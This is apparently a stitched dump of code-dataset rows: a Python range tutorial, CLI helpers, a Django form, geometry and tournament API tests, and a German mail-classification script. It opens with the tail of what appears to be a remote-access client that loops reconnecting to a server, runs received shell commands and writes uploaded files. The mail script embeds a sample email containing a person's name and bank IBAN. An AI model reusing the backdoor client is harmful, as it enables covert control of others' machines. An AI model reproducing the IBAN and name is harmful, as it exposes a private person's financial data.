self.socket.send("N".encode('utf-8'))
fileinfo = fileinfo.split(',')
filesize = fileinfo[1]
filename = fileinfo[0]
total = 0
f = open("./"+filename, 'wb')
l = self.socket.recv(1024)
total = len(l)
while (l):
f.write(l)
if (str(total) != filesize):
l = self.socket.recv(1024)
total = total + len(l)
else:
break
f.close()
return
def receiver(self):
timeout = time.time() + 300
while time.time() < timeout:
data = self.socket.recv(6).decode('utf-8')
if (data == 'shell0'):
self.receive_commands()
timeout = time.time() + 300
elif (data == 'upload'):
self.receive_file()
timeout = time.time() + 300
elif (data == 'discon'):
return
time.sleep(0.5)
return
def main():
client = Client()
client.register_signal_handler()
client.socket_create()
while True:
try:
client.socket_connect()
except Exception as e:
time.sleep(5)
else:
break
client.receiver()
client.socket.close()
return
while True:
time.sleep(0.1)
main()
| 3,637 | 0 | 261 |
64343d013519933355c64587bf336eeec5a5ee82 | 1,884 | py | Python | Module1/Day07/module1_day07_ranges.py | mollysaweikis/100DaysPython | 464533eb52944fff8858c2e0e0f3b25f1bff7350 | [
"MIT"
] | 23 | 2019-05-31T18:00:26.000Z | 2021-11-21T19:08:19.000Z | Module1/Day07/module1_day07_ranges.py | btruck552/100DaysPython | 1e45a10387da6d4ebdf8aa5fe13843a4509c8b62 | [
"MIT"
] | null | null | null | Module1/Day07/module1_day07_ranges.py | btruck552/100DaysPython | 1e45a10387da6d4ebdf8aa5fe13843a4509c8b62 | [
"MIT"
] | 42 | 2019-05-31T17:54:28.000Z | 2022-02-12T22:09:51.000Z | """
Author: CaptCorpMURICA
Project: 100DaysPython
File: module1_day07_ranges.py
Creation Date: 6/2/2019, 8:55 AM
Description: Basic instruction of ranges in python.
"""
# A range starts with an index of 0 and ends with the declared value. The endpoint of a range in not inclusive.
# Therefore, the range will contain indices from 0 to 41, but it will not use 42.
print(range(10))
print(list(range(10)))
print(range(0, 9, 2) == range(0, 10, 2))
# The range declaration has the format `range(start, stop, step)`.
even = range(0, 10, 2)
odd = range(1, 10, 2)
print("The even range is {} and the values are {}".format(even, list(even)))
print("The odd range is {} and the values are {}".format(odd, list(odd)))
# If the step is negative, then the range values are produced in reverse. The higher number must be in the start
# position if producing results in reverse.
even = range(10, 0, -2)
odd = range(9, 0, -2)
print("The even range is {} and the values are {}".format(even, list(even)))
print("The odd range is {} and the values are {}".format(odd, list(odd)))
# By using a specific step value, a range can be used to identify a collection of numbers divisible by a specific value.
# This example uses the `input()` function to prompt the user for input. It also used `if/elif/else` statements, which
# will be covered on [Day 10](../Module1/Day10).
val = int(input("Please provide a whole number for the divisibility check: "))
request = int(input("Please provide a whole number, less than 1 million, that is to be tested for divisibility: "))
in_range = range(val, 1000000, val)
if request > 1000000:
print("Please select a number less than 1 million and try again. Thank you")
elif request in in_range:
print("{} is divisible by {}.".format(request, val))
else:
print("{} is not divisible by {}.".format(request, val))
| 50.918919 | 120 | 0.69586 | """
Author: CaptCorpMURICA
Project: 100DaysPython
File: module1_day07_ranges.py
Creation Date: 6/2/2019, 8:55 AM
Description: Basic instruction of ranges in python.
"""
# A range starts with an index of 0 and ends with the declared value. The endpoint of a range in not inclusive.
# Therefore, the range will contain indices from 0 to 41, but it will not use 42.
print(range(10))
print(list(range(10)))
print(range(0, 9, 2) == range(0, 10, 2))
# The range declaration has the format `range(start, stop, step)`.
even = range(0, 10, 2)
odd = range(1, 10, 2)
print("The even range is {} and the values are {}".format(even, list(even)))
print("The odd range is {} and the values are {}".format(odd, list(odd)))
# If the step is negative, then the range values are produced in reverse. The higher number must be in the start
# position if producing results in reverse.
even = range(10, 0, -2)
odd = range(9, 0, -2)
print("The even range is {} and the values are {}".format(even, list(even)))
print("The odd range is {} and the values are {}".format(odd, list(odd)))
# By using a specific step value, a range can be used to identify a collection of numbers divisible by a specific value.
# This example uses the `input()` function to prompt the user for input. It also used `if/elif/else` statements, which
# will be covered on [Day 10](../Module1/Day10).
val = int(input("Please provide a whole number for the divisibility check: "))
request = int(input("Please provide a whole number, less than 1 million, that is to be tested for divisibility: "))
in_range = range(val, 1000000, val)
if request > 1000000:
print("Please select a number less than 1 million and try again. Thank you")
elif request in in_range:
print("{} is divisible by {}.".format(request, val))
else:
print("{} is not divisible by {}.".format(request, val))
| 0 | 0 | 0 |
603451b8330fc6c53dc0f78f6b33e3feeec049e4 | 2,242 | py | Python | env/lib/python3.7/site-packages/cleo/inputs/api.py | Kolawole39/masonite-guides-tutorial | 9a21cc635291a42f0722f69925be1809bb20e01c | [
"MIT"
] | null | null | null | env/lib/python3.7/site-packages/cleo/inputs/api.py | Kolawole39/masonite-guides-tutorial | 9a21cc635291a42f0722f69925be1809bb20e01c | [
"MIT"
] | null | null | null | env/lib/python3.7/site-packages/cleo/inputs/api.py | Kolawole39/masonite-guides-tutorial | 9a21cc635291a42f0722f69925be1809bb20e01c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .input_argument import InputArgument
from .input_option import InputOption
def argument(name, description='',
required=False, default=None, is_list=False,
validator=None):
"""
Helper function to create a new argument.
:param name: The name of the argument.
:type name: str
:param description: A helpful description of the argument.
:type description: str
:param required: Whether the argument is required or not.
:type required: bool
:param default: The default value of the argument.
:type default: mixed
:param is_list: Whether the argument should be a list or not.
:type list: bool
:param validator: An optional validator.
:type validator: Validator or str
:rtype: InputArgument
"""
mode = InputArgument.OPTIONAL
if required:
mode = InputArgument.REQUIRED
if is_list:
mode |= InputArgument.IS_LIST
return InputArgument(name, mode, description, default, validator)
def option(name, shortcut=None, description='',
flag=True, value_required=None, is_list=False,
default=None, validator=None):
"""
Helper function to create an option.
:param name: The name of the option
:type name: str
:param shortcut: The shortcut (Optional)
:type shortcut: str or None
:param description: The description of the option.
:type description: str
:param flag: Whether the option is a flag or not.
:type flag: bool
:param value_required: Whether a value is required or not.
:type value_required: bool or None
:param is_list: Whether the option is a list or not.
:type is_list: bool
:param default: The default value.
:type default: mixed
:param validator: An optional validator.
:type validator: Validator or str
:rtype: InputOption
"""
mode = InputOption.VALUE_IS_FLAG
if value_required is True:
mode = InputOption.VALUE_REQUIRED
elif value_required is False:
mode = InputOption.VALUE_OPTIONAL
if is_list:
mode |= InputOption.VALUE_IS_LIST
return InputOption(
name, shortcut, mode, description,
default, validator
)
| 24.911111 | 69 | 0.67083 | # -*- coding: utf-8 -*-
from .input_argument import InputArgument
from .input_option import InputOption
def argument(name, description='',
required=False, default=None, is_list=False,
validator=None):
"""
Helper function to create a new argument.
:param name: The name of the argument.
:type name: str
:param description: A helpful description of the argument.
:type description: str
:param required: Whether the argument is required or not.
:type required: bool
:param default: The default value of the argument.
:type default: mixed
:param is_list: Whether the argument should be a list or not.
:type list: bool
:param validator: An optional validator.
:type validator: Validator or str
:rtype: InputArgument
"""
mode = InputArgument.OPTIONAL
if required:
mode = InputArgument.REQUIRED
if is_list:
mode |= InputArgument.IS_LIST
return InputArgument(name, mode, description, default, validator)
def option(name, shortcut=None, description='',
flag=True, value_required=None, is_list=False,
default=None, validator=None):
"""
Helper function to create an option.
:param name: The name of the option
:type name: str
:param shortcut: The shortcut (Optional)
:type shortcut: str or None
:param description: The description of the option.
:type description: str
:param flag: Whether the option is a flag or not.
:type flag: bool
:param value_required: Whether a value is required or not.
:type value_required: bool or None
:param is_list: Whether the option is a list or not.
:type is_list: bool
:param default: The default value.
:type default: mixed
:param validator: An optional validator.
:type validator: Validator or str
:rtype: InputOption
"""
mode = InputOption.VALUE_IS_FLAG
if value_required is True:
mode = InputOption.VALUE_REQUIRED
elif value_required is False:
mode = InputOption.VALUE_OPTIONAL
if is_list:
mode |= InputOption.VALUE_IS_LIST
return InputOption(
name, shortcut, mode, description,
default, validator
)
| 0 | 0 | 0 |
b133940306ca184bafd714abfed2a77c71123f21 | 181 | py | Python | oidc_auth/forms.py | lccvufal/django-oidc-auth | ce36f1b83bce6f2bcf23fe40b94662eb5953cd4b | [
"MIT"
] | 25 | 2015-02-09T14:07:32.000Z | 2019-06-20T02:49:02.000Z | oidc_auth/forms.py | lccvufal/django-oidc-auth | ce36f1b83bce6f2bcf23fe40b94662eb5953cd4b | [
"MIT"
] | 11 | 2015-03-06T18:32:09.000Z | 2021-08-31T20:08:18.000Z | oidc_auth/forms.py | lccvufal/django-oidc-auth | ce36f1b83bce6f2bcf23fe40b94662eb5953cd4b | [
"MIT"
] | 23 | 2015-02-24T23:18:47.000Z | 2020-11-16T08:04:13.000Z | from django import forms
| 25.857143 | 71 | 0.712707 | from django import forms
class OpenIDConnectForm(forms.Form):
issuer = forms.CharField(max_length=200,
widget=forms.TextInput(attrs={'class': 'required openid'}))
| 0 | 132 | 23 |
b867197194af426b236ef30f05c0ba6ee90697c1 | 3,263 | py | Python | tests/test_polylabel.py | tfardet/Shapely | 462de3aa7a8bbd80408762a2d5aaf84b04476e4d | [
"BSD-3-Clause"
] | null | null | null | tests/test_polylabel.py | tfardet/Shapely | 462de3aa7a8bbd80408762a2d5aaf84b04476e4d | [
"BSD-3-Clause"
] | null | null | null | tests/test_polylabel.py | tfardet/Shapely | 462de3aa7a8bbd80408762a2d5aaf84b04476e4d | [
"BSD-3-Clause"
] | null | null | null | from . import unittest
from shapely.algorithms.polylabel import polylabel, Cell
from shapely.geometry import LineString, Point, Polygon
from shapely.errors import TopologicalError
| 38.388235 | 80 | 0.594851 | from . import unittest
from shapely.algorithms.polylabel import polylabel, Cell
from shapely.geometry import LineString, Point, Polygon
from shapely.errors import TopologicalError
class PolylabelTestCase(unittest.TestCase):
def test_polylabel(self):
"""
Finds pole of inaccessibility for a polygon with a tolerance of 10
"""
polygon = LineString([(0, 0), (50, 200), (100, 100), (20, 50),
(-100, -20), (-150, -200)]).buffer(100)
label = polylabel(polygon, tolerance=10)
expected = Point(59.35615556364569, 121.8391962974644)
self.assertTrue(expected.equals_exact(label, 1e-6))
def test_invalid_polygon(self):
"""
Makes sure that the polylabel function throws an exception when provided
an invalid polygon.
"""
bowtie_polygon = Polygon([(0, 0), (0, 20), (10, 10), (20, 20),
(20, 0), (10, 10), (0, 0)])
self.assertRaises(TopologicalError, polylabel, bowtie_polygon)
def test_cell_sorting(self):
"""
Tests rich comparison operators of Cells for use in the polylabel
minimum priority queue.
"""
polygon = Point(0, 0).buffer(100)
cell1 = Cell(0, 0, 50, polygon) # closest
cell2 = Cell(50, 50, 50, polygon) # furthest
self.assertLess(cell1, cell2)
self.assertLessEqual(cell1, cell2)
self.assertFalse(cell2 <= cell1)
self.assertEqual(cell1, cell1)
self.assertFalse(cell1 == cell2)
self.assertNotEqual(cell1, cell2)
self.assertFalse(cell1 != cell1)
self.assertGreater(cell2, cell1)
self.assertFalse(cell1 > cell2)
self.assertGreaterEqual(cell2, cell1)
self.assertFalse(cell1 >= cell2)
def test_concave_polygon(self):
"""
Finds pole of inaccessibility for a concave polygon and ensures that
the point is inside.
"""
concave_polygon = LineString([(500, 0), (0, 0), (0, 500),
(500, 500)]).buffer(100)
label = polylabel(concave_polygon)
self.assertTrue(concave_polygon.contains(label))
def test_rectangle_special_case(self):
"""
The centroid algorithm used is vulnerable to floating point errors
and can give unexpected results for rectangular polygons. Test
that this special case is handled correctly.
https://github.com/mapbox/polylabel/issues/3
"""
polygon = Polygon([(32.71997,-117.19310), (32.71997,-117.21065),
(32.72408,-117.21065), (32.72408,-117.19310)])
label = polylabel(polygon)
self.assertEqual(label.coords[:], [(32.722025, -117.201875)])
def test_polygon_with_hole(self):
"""
Finds pole of inaccessibility for a polygon with a hole
https://github.com/Toblerity/Shapely/issues/817
"""
polygon = Polygon(
shell=[(0, 0), (10, 0), (10, 10), (0, 10), (0, 0)],
holes=[[(2, 2), (6, 2), (6, 6), (2, 6), (2, 2)]],
)
label = polylabel(polygon, 0.05)
self.assertAlmostEqual(label.x, 7.65625)
self.assertAlmostEqual(label.y, 7.65625)
| 0 | 3,059 | 23 |
ede842ae17f244943ab73140632c28eb84e35b08 | 20,307 | py | Python | api/test/hand_handler_test.py | jrockway/tichu-tournament | 6335b8fab89b76c42ac5a078176a500a11f0e4ff | [
"MIT"
] | null | null | null | api/test/hand_handler_test.py | jrockway/tichu-tournament | 6335b8fab89b76c42ac5a078176a500a11f0e4ff | [
"MIT"
] | null | null | null | api/test/hand_handler_test.py | jrockway/tichu-tournament | 6335b8fab89b76c42ac5a078176a500a11f0e4ff | [
"MIT"
] | null | null | null | import json
import unittest
import webtest
import os
from google.appengine.ext import testbed
from api.src import main
| 44.24183 | 83 | 0.610922 | import json
import unittest
import webtest
import os
from google.appengine.ext import testbed
from api.src import main
class AppTest(unittest.TestCase):
def setUp(self):
os.environ['AUTH_DOMAIN'] = 'testbed'
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_datastore_v3_stub()
self.testbed.init_memcache_stub()
self.testapp = webtest.TestApp(main.app)
def tearDown(self):
self.testbed.deactivate()
def testHead_bad_id(self):
self.loginUser()
id = self.AddBasicTournament()
self.AddBasicHand(id)
self.logoutUser()
response = self.testapp.head("/api/tournaments/{}a/hands/1/2/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
def testHead_bad_parameters(self):
self.loginUser()
id = self.AddBasicTournament()
self.AddBasicHand(id)
self.logoutUser()
response = self.testapp.head("/api/tournaments/{}/hands/1a/2/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.head("/api/tournaments/{}/hands/0/2/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.head("/api/tournaments/{}/hands/25/2/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.head("/api/tournaments/{}/hands/1/2a/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.head("/api/tournaments/{}/hands/1/0/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.head("/api/tournaments/{}/hands/1/9/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.head("/api/tournaments/{}/hands/1/2/3a".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.head("/api/tournaments/{}/hands/1/2/0".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.head("/api/tournaments/{}/hands/1/2/9".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
def testHead_present(self):
self.loginUser()
id = self.AddBasicTournament()
self.AddBasicHand(id)
self.logoutUser()
response = self.testapp.head("/api/tournaments/{}/hands/1/2/3".format(id))
self.assertEqual(response.status_int, 200)
def testHead_not_present(self):
self.loginUser()
id = self.AddBasicTournament()
self.AddBasicHand(id)
self.logoutUser()
response = self.testapp.head("/api/tournaments/{}/hands/2/2/3".format(id))
self.assertEqual(response.status_int, 204)
def testHead_deleted(self):
self.loginUser()
id = self.AddBasicTournament()
self.AddBasicHand(id)
response = self.testapp.delete("/api/tournaments/{}/hands/1/2/3".format(id))
response = self.testapp.head("/api/tournaments/{}/hands/1/2/3".format(id))
self.assertEqual(response.status_int, 204)
self.AddBasicHand(id)
response = self.testapp.head("/api/tournaments/{}/hands/1/2/3".format(id))
self.assertEqual(response.status_int, 200)
def testPut_bad_id(self):
self.loginUser()
id = self.AddBasicTournament()
self.logoutUser()
params = {'calls': {}, 'ns_score': 75, 'ew_score': 25}
response = self.testapp.put_json("/api/tournaments/{}a/hands/1/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 404)
def testPut_bad_parameters(self):
self.loginUser()
id = self.AddBasicTournament()
self.logoutUser()
params = {'calls': {}, 'ns_score': 75, 'ew_score': 25}
response = self.testapp.put_json("/api/tournaments/{}/hands/1a/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.put_json("/api/tournaments/{}/hands/0/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.put_json("/api/tournaments/{}/hands/25/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2a/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.put_json("/api/tournaments/{}/hands/1/0/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.put_json("/api/tournaments/{}/hands/1/25/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3a".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/0".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/35".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 404)
def testPut_invalid_scoring(self):
self.loginUser()
id = self.AddBasicTournament()
params = {'calls': {}, 'ns_score': 75, 'ew_score': 20}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 400)
params = {'calls': {'north': 'G' }, 'ns_score': 75, 'ew_score': 25}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 400)
params = {'calls': {'north': "T" }, 'ns_score': 60, 'ew_score': 40}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 400)
params = {'calls': {'north': "T" }, 'ns_score': -30, 'ew_score': 130}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 400)
params = {'ns_score': 0, 'ew_score': 0}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 400)
def testPut_score_exists_not_logged_in(self):
self.loginUser()
id = self.AddBasicTournament()
params = {'calls': {}, 'ns_score': 75, 'ew_score': 25}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params)
self.logoutUser()
params = {'calls': {}, 'ns_score': 25, 'ew_score': 75}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 403)
def testPut_score_exists_does_not_own(self):
self.loginUser()
id = self.AddBasicTournament()
params = {'calls': {}, 'ns_score': 75, 'ew_score': 25}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params)
self.loginUser('user2@example.com', '234')
params = {'calls': {}, 'ns_score': 25, 'ew_score': 75}
hand_headers = {'X-tichu-pair-code' : 'AAAA'}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params, headers=hand_headers,
expect_errors=True)
self.assertEqual(response.status_int, 403)
def testPut_invalid_config(self):
self.loginUser()
id = self.AddBasicTournament()
params = {'calls': { 'north': "T" },
'ns_score': 75,
'ew_score': 25,
'notes': 'I am a note'}
response = self.testapp.put_json("/api/tournaments/{}/hands/4/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 400)
def testPut_null_calls(self):
self.loginUser()
id = self.AddBasicTournament()
params = {'ns_score': 75,
'ew_score': 25,
'notes': 'I am a note'}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params)
self.assertEqual(response.status_int, 204)
def testPut_avg_calls(self):
self.loginUser()
id = self.AddBasicTournament()
params = {'calls': { 'north': "T" },
'ns_score' : ' aVg ',
'ew_score' : ' Avg+ '}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params)
self.assertEqual(response.status_int, 204)
params = {'ns_score' : 'avG++',
'ew_score' : 'avg-'}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params)
self.assertEqual(response.status_int, 204)
params = {'ns_score' : 'AVG--',
'ew_score' : 'avg '}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params)
self.assertEqual(response.status_int, 204)
def testPut_avg_calls_bad_input(self):
self.loginUser()
id = self.AddBasicTournament()
params = {'ns_score' : ' aVg ',
'ew_score' : 123}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params, expect_errors=True)
self.assertEqual(response.status_int, 400)
def testPut(self):
self.loginUser()
id = self.AddBasicTournament()
params = {'calls': { 'north': "T" },
'ns_score': 75,
'ew_score': 125,
'notes': 'I am a note'}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params)
self.assertEqual(response.status_int, 204)
# Test the hand is there
response = self.testapp.get("/api/tournaments/{}".format(id))
hand_list = json.loads(response.body)['hands']
self.assertEqual(1, len(hand_list))
self.assertEqual( { 'north': "T" }, hand_list[0]['calls'])
self.assertEqual(75, hand_list[0]['ns_score'])
self.assertEqual(125, hand_list[0]['ew_score'])
self.assertEqual('I am a note', hand_list[0]['notes'])
self.assertEqual(1, hand_list[0]['board_no'])
self.assertEqual(2, hand_list[0]['ns_pair'])
self.assertEqual(3, hand_list[0]['ew_pair'])
# Override the hand.
params = {'calls': {}, 'ns_score': 20, 'ew_score': 80}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params)
self.assertEqual(response.status_int, 204)
response = self.testapp.get("/api/tournaments/{}".format(id))
self.CheckBasicTournamentMetadataUnchanged(json.loads(response.body))
hand_list = json.loads(response.body)['hands']
self.assertEqual(1, len(hand_list))
self.assertEqual({}, hand_list[0]['calls'])
self.assertEqual(20, hand_list[0]['ns_score'])
self.assertEqual(80, hand_list[0]['ew_score'])
self.assertIsNone(hand_list[0].get('notes'))
self.assertEqual(1, hand_list[0]['board_no'])
self.assertEqual(2, hand_list[0]['ns_pair'])
self.assertEqual(3, hand_list[0]['ew_pair'])
# Override the hand again but now as a logged out user with the right
# credentials.
response = self.testapp.get("/api/tournaments/{}/pairids/2".format(id))
opaque_id = json.loads(response.body)['pair_id']
self.logoutUser()
params = {'calls': {}, 'ns_score': 25, 'ew_score': 75}
hand_headers = {'X-tichu-pair-code' : str(opaque_id)}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params, headers=hand_headers)
self.loginUser()
self.assertEqual(response.status_int, 204)
response = self.testapp.get("/api/tournaments/{}".format(id))
self.CheckBasicTournamentMetadataUnchanged(json.loads(response.body))
hand_list = json.loads(response.body)['hands']
self.assertEqual(1, len(hand_list))
self.assertEqual({}, hand_list[0]['calls'])
self.assertEqual(25, hand_list[0]['ns_score'])
self.assertEqual(75, hand_list[0]['ew_score'])
self.assertIsNone(hand_list[0].get('notes'))
self.assertEqual(1, hand_list[0]['board_no'])
self.assertEqual(2, hand_list[0]['ns_pair'])
self.assertEqual(3, hand_list[0]['ew_pair'])
# Add a second hand, check that both hands are set correctly.
params = {'calls': {'south': "T", 'east': "", 'west': "GT", 'north': ""},
'ns_score': -75,
'ew_score': 275}
response = self.testapp.put_json("/api/tournaments/{}/hands/10/5/6".format(id),
params)
self.assertEqual(response.status_int, 204)
response = self.testapp.get("/api/tournaments/{}".format(id))
self.CheckBasicTournamentMetadataUnchanged(json.loads(response.body))
hand_list = json.loads(response.body)['hands']
self.assertEqual(2, len(hand_list))
first_hand = self.GetHandFromList(hand_list, 1)
self.assertEqual({}, first_hand['calls'])
self.assertEqual(25, first_hand['ns_score'])
self.assertEqual(75, first_hand['ew_score'])
self.assertIsNone(first_hand.get('notes'))
self.assertEqual(1, first_hand['board_no'])
self.assertEqual(2, first_hand['ns_pair'])
self.assertEqual(3, first_hand['ew_pair'])
second_hand = self.GetHandFromList(hand_list, 10)
self.assertEqual({'south': "T", 'east': "", 'west': "GT", 'north': ""},
second_hand['calls'])
self.assertEqual(-75, second_hand['ns_score'])
self.assertEqual(275, second_hand['ew_score'])
self.assertIsNone(second_hand.get('notes'))
self.assertEqual(10, second_hand['board_no'])
self.assertEqual(5, second_hand['ns_pair'])
self.assertEqual(6, second_hand['ew_pair'])
def testDelete_not_logged_in(self):
self.loginUser()
id = self.AddBasicTournament()
self.AddBasicHand(id)
self.logoutUser()
response = self.testapp.delete("/api/tournaments/{}/hands/1/2/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 401)
def testDelete_not_owner(self):
self.loginUser()
id = self.AddBasicTournament()
self.AddBasicHand(id)
self.loginUser('user2@example.com', id='234')
response = self.testapp.delete("/api/tournaments/{}/hands/1/2/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 403)
def testDelete_bad_parameters(self):
self.loginUser()
id = self.AddBasicTournament()
self.AddBasicHand(id)
response = self.testapp.delete("/api/tournaments/{}a/hands/1a/2/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.delete("/api/tournaments/{}/hands/1a/2/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.delete("/api/tournaments/{}/hands/0/2/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.delete("/api/tournaments/{}/hands/25/2/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.delete("/api/tournaments/{}/hands/1/2a/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.delete("/api/tournaments/{}/hands/1/0/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.delete("/api/tournaments/{}/hands/1/9/3".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.delete("/api/tournaments/{}/hands/1/2/3a".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.delete("/api/tournaments/{}/hands/1/2/0".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
response = self.testapp.delete("/api/tournaments/{}/hands/1/2/9".format(id),
expect_errors=True)
self.assertEqual(response.status_int, 404)
def testDelete(self):
self.loginUser()
id = self.AddBasicTournament()
# Add simple hand.
self.AddBasicHand(id)
# Add a second hand to make sure only the first one is deleted.
params = {'calls': {}, 'ns_score': 25, 'ew_score': 75}
response = self.testapp.put_json("/api/tournaments/{}/hands/2/2/3".format(id),
params)
response = self.testapp.delete("/api/tournaments/{}/hands/1/2/3".format(id))
self.assertEqual(response.status_int, 204)
response = self.testapp.get("/api/tournaments/{}".format(id))
hand_list = json.loads(response.body)['hands']
self.assertEqual(1, len(hand_list))
self.assertEqual({}, hand_list[0]['calls'])
self.assertEqual(25, hand_list[0]['ns_score'])
self.assertEqual(75, hand_list[0]['ew_score'])
self.assertIsNone(hand_list[0].get('notes'))
self.assertEqual(2, hand_list[0]['board_no'])
self.assertEqual(2, hand_list[0]['ns_pair'])
self.assertEqual(3, hand_list[0]['ew_pair'])
def loginUser(self, email='user@example.com', id='123', is_admin=False):
self.testbed.setup_env(
user_email=email,
user_id=id,
user_is_admin='1' if is_admin else '0',
overwrite=True)
def logoutUser(self):
self.testbed.setup_env(
user_email='',
user_id='',
user_is_admin='',
overwrite=True)
def AddBasicTournament(self):
params = {'name': 'name', 'no_pairs': 8, 'no_boards': 24,
'players': [{'pair_no': 2, 'name': "My name", 'email': "My email"},
{'pair_no': 7}]}
response = self.testapp.post_json("/api/tournaments", params)
self.assertNotEqual(response.body, '')
response_dict = json.loads(response.body)
id = response_dict['id']
self.assertIsNotNone(id)
return id
def CheckBasicTournamentMetadataUnchanged(self, response_dict):
self.assertEqual([{'pair_no': 2, 'name': "My name", 'email': "My email"},
{'pair_no': 7}],
response_dict['players'])
self.assertEqual('name', response_dict['name'])
self.assertEqual(8, response_dict['no_pairs'])
self.assertEqual(24, response_dict['no_boards'])
def AddBasicHand(self, id):
self.loginUser()
params = {'calls': {}, 'ns_score': 75, 'ew_score': 25}
response = self.testapp.put_json("/api/tournaments/{}/hands/1/2/3".format(id),
params)
self.assertEqual(response.status_int, 204)
def GetHandFromList(self, hand_list, board_no):
for hand in hand_list:
if hand.get('board_no') == board_no:
return hand
return None
| 19,408 | 12 | 717 |
576fda55cc6908ed1c0d5f2b87e5c72699a1dbaa | 1,786 | py | Python | src/test.py | kumarnikhil936/MailClassification_NLTK_Sklearn_Flask_Docker | df919005e2ceafa1d90fb1ab0c302f2220e0906d | [
"MIT"
] | null | null | null | src/test.py | kumarnikhil936/MailClassification_NLTK_Sklearn_Flask_Docker | df919005e2ceafa1d90fb1ab0c302f2220e0906d | [
"MIT"
] | null | null | null | src/test.py | kumarnikhil936/MailClassification_NLTK_Sklearn_Flask_Docker | df919005e2ceafa1d90fb1ab0c302f2220e0906d | [
"MIT"
] | null | null | null | import yaml
from joblib import load
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
from helpers import preprocess_single_text, load_mapping
text = "ki_erstattung_test_topf2.txt Details Activity ki_erstattung_test_topf2.txt Sharing Info. Who has access M General Info. System properties Type Text Size 496 bytes Storage used 496 bytes Location testcases Owner Marc Bachmann Modified Dec 15, 2021 by Marc Bachmann Opened 6:32 PM by me Created Dec 15, 2021 Description. No description Download permissions. Viewers can download From: Marijke Holtkamp <m.etzrodtgweb.de> To: tierarztrechnung@barmenia.de Subject Tierarztrechungen Sent Thu, 21 Oct 2021 14:28:46+0200 IMG 2798.JPG IMG_2799.JPG Sehr geehrte Damen und Herren, anbei sende ich Ihnen die Tierarztrechnung unserer Hündin Clara Tari mit der bitte um Erstattung: KreisSparkasse Köln DE 74 3705 0299 1152 0271 47 BIC COKSDE33xxX Vielen Dank.! Mit freundlichem Gruß Marijke Holtkamp"
stopwords_locale = 'german'
stemmer = SnowballStemmer(stopwords_locale)
stop_words = set(stopwords.words(stopwords_locale))
with open('../dataset/stopwords.yaml', 'r') as f:
curated_stop_words = yaml.safe_load(f)
text = preprocess_single_text(text, stop_words=stop_words, curated_stop_words=curated_stop_words, stemming=True, stemmer=stemmer)
